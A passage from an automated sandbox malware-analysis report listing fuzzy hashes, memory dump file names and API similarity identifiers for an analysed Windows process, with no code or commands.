                                                                                          • Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                          • Instruction Fuzzy Hash: FC112E3261DB81C2EB61AF15E54025AB7E5FB89B84F984234EE8C87768DF3CD5518704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                          • String ID: :
                                                                                          • API String ID: 2595371189-336475711
                                                                                          • Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                          • Instruction ID: 791c47d73f2a140c2334c011fc461f7d2858c500e46a416e67c022d5f70722ee
                                                                                          • Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                          • Instruction Fuzzy Hash: 67018BA2A2C243C6FB20BF60D4626BE63A0EF94708FC10436ED4DC6691DE2CE504DA1C